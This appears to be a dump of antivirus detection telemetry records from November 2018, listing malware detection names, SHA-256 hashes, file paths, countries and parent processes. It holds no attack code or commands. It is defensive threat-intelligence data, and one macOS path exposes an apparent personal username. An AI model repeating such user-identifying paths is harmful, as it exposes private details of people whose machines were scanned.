  Row(detection=Row(filename='avscan-20181101-152503-3e4f67b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152503-3E4F67B6', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4 trainer 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\TRAINING 4 TRAINER 2015\\4 TRAINER 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='160905.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\160905\\160905.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114333-e691004a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-114333-E691004A', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:43:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:11:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\Users\\All Users\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:27:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhdd5.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHDD5.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdcim.exe', filepath='E:\\gDCIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsd6A1C.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:15:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125557-59c13640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-125537-48996B9B\\AVSCAN-20181101-125557-59C13640', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:55:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_ba2e8a34.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_ba2e8a34.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsk9195.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:19:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker_e28ce949.vir', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker_e28ce949.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Diebold\\Warsaw\\core.exe', parentsize=1083736, timestamp='2018-11-01T16:14:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\CAE108464DD278B34F958DBB74FFEFE382EF99E74B048BB4AE1BE95671688A2F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mssys.exe', filepath='C:\\Windows\\system\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.c00540.#M1.#R1'), hash='c0054073ac6a99b0a8971c4d17a437dbfde3319cab355192e248c02b21a99cf8', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\system\\sys\\syscon\\mssys.exe', parentsize=1024000, timestamp='2018-11-01T09:07:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='non-cpdf.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\Start\\en-US\\tpl\\non-cpdf\\non-cpdf.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110450-d362b633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e55647dd\\AVSCAN-20181101-110337-CD3CD6C6\\AVSCAN-20181101-110450-D362B633', filesize=1536000, name='TR/BitCoinMiner.fxkbh.#M1.#R1'), hash='9bb685774ab6d6bb03a67bb3b4217ee9bf2dbadea7d5d2eb1865121811584b3b', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:04:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dfserv.exe', filepath='C:\\Program Files (x86)\\Faronics\\Deep Freeze\\Install C-0\\DFServ.exe', filesize=2112000, name='TR/Crypt.XPACK.Gen.#M300.#R4032'), hash='dd69199040d742d157694ea777536d9dc3396365fb06cdac97c76312da89a83f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:10:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ad.scr', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\advertisement\\ad\\ad.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='\\\\?\\H:\\putty.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='77ce4135683e9eacca2bb102b4422901af013a53b50e242b875e2f0acbde0143', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='u4.exe', filepath='E:\\U4.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110834-e87cbc30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110834-E87CBC30', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151539-65d0829c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b55ac59c\\AVSCAN-20181101-151510-62C05EB2\\AVSCAN-20181101-151539-65D0829C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081142-961791b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-081142-961791B7', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:11:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r82jm5e', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R82JM5E', filesize=64000, name='VBA/Dldr.Agent.qydjb.#M1.#R1'), hash='9213945835b546068fe6f16eca3601a864e18182394e6af9baad8cc437babd70', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='classicwords.exe', filepath='G:\\ClassicWords.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='61a433746d3cf7ffafc4a1e06d48c2b686823e142145d7b01a7163123d9e8bd5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110329-c1ecea3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110329-C1ECEA3E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T04:20:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-065221-c3040866', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9bb611a\\AVSCAN-20181101-055500-1F89EAA1\\AVSCAN-20181101-065221-C3040866', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:55:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00091be0', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00091be0', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:17:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Nová složka (2)\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Nová složka (2)\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:17:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214047-f27a176c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1e6ba50\\AVSCAN-20181101-214030-EF2B793B\\AVSCAN-20181101-214047-F27A176C', filesize=1536000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:40:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3dx9.dll', filepath='E:\\Vape_2.47 Cracked by furyzzyt - Minecrafthax.net\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='d3dx9.dll,EntryPoint', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=61952, timestamp='2018-11-01T15:40:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0123720.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0123720.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:14:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T20:38:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='701926fd93e9c2d0aab4db525a57077a873abcbe63511ed7990078de635703fb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\701926FD93E9C2D0AAB4DB525A57077A873ABCBE63511ED7990078DE635703FB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='701926fd93e9c2d0aab4db525a57077a873abcbe63511ed7990078de635703fb', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:41:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T18:24:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104137-72a26420', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b09e9dda\\AVSCAN-20181101-103625-4BEDE389\\AVSCAN-20181101-104137-72A26420', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:41:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b1d', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b1d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212331-c232a4a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e9cab702\\AVSCAN-20181101-212312-BED111BB\\AVSCAN-20181101-212331-C232A4A0', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='4e0cfcd6a5358c4465ddc79d70cd314859633ad974fbeac04f8c4cbcaf7b39ee', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002154-34b8a40a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002154-34B8A40A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-092554-b4488b25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181102-091734-6AAEB4B9\\AVSCAN-20181102-092554-B4488B25', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skm_4050151222162800 (1).doc', filepath='/Users/paulpettitt/Downloads/SKM_4050151222162800 (1).doc', filesize=64000, name='W97M/Dldr.Agent.AM.7117126.#M0.#R0'), hash='60c2aa4d30f1a1d84e03cde89c9d16de70071f0bed798a95e309218a8ee64997', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:38:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T16:37:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vwtester.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.451\\VAG K+CAN Commander 2.5\\VWTester.exe', filesize=512000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100871'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\VAG K+CAN Commander 2.5.zip\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1534456, timestamp='2018-11-01T17:44:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f15840416_mimikatz.exe', filepath='C:\\Users\\X\\Downloads\\testdisk-7.0.win\\testdisk-7.0\\recup_dir.172\\f15840416_mimikatz.exe', filesize=576000, name='HEUR/AGEN.1013725.#M1.#R1'), hash='32bcd17d3c8a769fa15021977324aaa7b624437cd03266a3614e54bbe330182c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904304, timestamp='2018-11-01T07:28:40Z'), dt=datetime.date(2018, 11, 1)),
